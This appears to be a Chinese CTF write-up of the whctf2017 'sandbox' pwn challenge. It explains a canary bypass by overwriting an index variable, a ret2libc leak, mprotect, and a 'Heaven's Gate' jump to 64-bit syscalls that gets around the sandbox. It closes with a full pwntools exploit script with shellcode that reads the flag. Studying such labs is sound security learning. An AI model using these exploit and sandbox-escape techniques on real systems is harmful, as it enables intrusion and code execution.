pwn学习之三

whctf2017的一道pwn题sandbox，这道题提供了两个可执行文件加一个libc，两个可执行文件是一个vuln，一个sandbox，这是一道通过沙盒去保护vuln不被攻击的题目。

用ida打开vuln：

进入80485CB函数：

这里s给的空间是48但是输入是直到换行停止，这里就存在了栈溢出。但是这道题目开了CANARY，所以不能直接覆盖到返回地址。注意到这题，s的空间下面就是v5，而v5是控制写到s的位置，所以可以通过覆盖v5到返回地址而绕过修改那段Cookie，在不开sandbox的情况下拿shell的办法为：

1.覆盖返回地址为puts函数的plt表地址，由于这样跳转少了一个call函数也就是没有push返回地址，所以对于puts函数执行完的返回地址就是进入这个函数时的esp地址的下一个地址，然后再下一个地址就是puts函数的参数，第一次提交'a'*0x30+p8(0x48)+p32(puts_plt)+p32(main_addr)+p32(puts_got)这样就会在执行到函数retn时去执行puts(puts_got)然后再返回到main函数中去。

2.拿到了puts函数的实际地址再通过libc文件去拿到system函数的实际地址，再到第二次输入把/bin/sh写到内存中去，也就是调用read函数，提交'a'*0x30+p8(0x48)+p32(read_plt)+p32(main_addr)+p32(0)+p32(0x0804a02c),这样在执行完函数时会返回到read函数，接着输入'/bin/sh'就将字符串写到了0x0804a02c里。

3.最后调用system函数，参数为0x0804a02c即可拿到shell。

sandbox程序通过系统调用号限制了一些函数的使用，如execve、open、clone、vfork、create、opennat等，同时还会不停杀死新的进程。要绕过沙盒要知道两点，一是32位的系统调用号和64位的系统调用号不同，二是可以在32位进程中使用64位的系统调用要用到CS寄存器。

在CPU处于保护模式下运行时，CS其实是段选择器，通过CS的值去找描述符表内对应的代码段基址。这里参考资料：https://www.malwaretech.com/2014/02/the-0x33-segment-selector-heavens-gate.html

所以我们要做的就是把CS寄存器从0x23变成0x33，这个需要通过远跳转来实现，即jmp 0x33:addr。知道了如何跳到64位还要知道32位和64位系统调用时的情况，在32位系统中，是通过int $0x80进入系统调用，eax为系统调用号，参数依次放在ebx,ecx,edx中，而在64位系统中，是通过syscall进入系统调用，rax为系统调用号，参数依次放在rdi,rsi,rdx中。

那么这道题的解题过程为：

1,2两步同上(2中将写入/bin/sh改为写入./flag)。

3.通过puts函数实际地址和libc拿到mprotect函数的实际地址，通过mprotect函数去申请一个内存页为可读可写可执行，提交p32(mprotect_addr)+p32(main_addr)+p32(0x0804a000)+p32(0x1000)+p32(7)，这样将0x0804a000变为了可执行的内存段。

4.通过read函数向0x0804a000中写入代码同时设置返回值为0x0804a000，这样read函数运行完后即可到0x0804a000去执行写入的代码（这里由于sandbox会不断的杀死新的进程，所以并没有使用execve函数而是使用了open,read,write函数将flag文件读取到终端上显示）。

exp:

 from pwn import *
 context(arch='i386',os='linux',endian='little')
 context.log_level='debug'

 def game_start(p,libc):
     puts_plt=0x08048470
     puts_got=0x0804A018
     main_addr=0x0804865B
     read_plt=0x08048440
     payload='a'*48+p8(0x48)+p32(puts_plt)+p32(main_addr)+p32(puts_got)
     p.sendline(payload)
     print p.recvline()
     re = p.recv()
     puts_addr = u32(re[:4])
     print hex(puts_addr)
     data_addr = 0x0804A02C
     payload='a'*48+p8(0x48)
     system_addr = puts_addr-libc.symbols['puts']+libc.symbols['system']
     mprotect_addr = puts_addr-libc.symbols['puts']+libc.symbols['mprotect']
     print hex(system_addr)
     payload+=p32(read_plt)+p32(main_addr)+p32(0)+p32(data_addr)+p32(0x40)
     p.sendline(payload)
     print 'before:'+p.recvline()

     p.send('./flag')
     payload='a'*48+p8(0x48)
     payload+=p32(mprotect_addr)+p32(main_addr)+p32(0x0804a000)+p32(0x1000)+p32(7)
     p.sendline(payload)
     print 'third puts s:'+p.recvline()
     payload='a'*48+p8(0x48)
     payload+=p32(read_plt)+p32(0x0804ab00)+p32(0)+p32(0x0804ab00)+p32(0x200)
     p.sendline(payload)
     print 'fourth puts s:'+p.recvline()
     payload=asm('jmp 0x33:0x0804ab20',arch='i386').ljust(0x20,'\x90')
     shellcode64 = '''
     BITS 64
     org 0x0804ab20
     mov rdi, 0x0804a02c
     xor rsi, rsi
     mov rax, 2
     syscall
     mov rdi, rax
     mov rax, 0
     mov rsi, 0x0804a900
     mov rdx, 0x100
     syscall
     mov rdx, rax
     mov rdi, 1
     mov rsi, 0x0804a900
     mov rax, 1
     syscall
     mov rdi, 0
     mov rax, 60
     syscall
     '''
     f = open('shell64.asm', 'wb')
     f.write(shellcode64.strip())
     f.close()
     os.popen('nasm -f bin -o shell64 shell64.asm')
     f = open('./shell64', 'rb')
     d2 = f.read()
     f.close()
     payload+=d2
     p.sendline(payload)
     p.interactive()

 if __name__=='__main__':
     debug=1
     if debug==1:
         p=process('./vuln')
         #p=process(['./sandbox','./vuln'])
         libc=ELF('./libc-32.so')
     else:
         p=remote('118.31.18.145',20004)
         libc=ELF('./libc.so.6')

     #gdb.attach(p,'b *0x0804863F')

 game_start(p,libc)

sandbox题目下载地址：http://files.cnblogs.com/files/lllkh/68025091-fb40-4281-83ea-230331c1448a.gz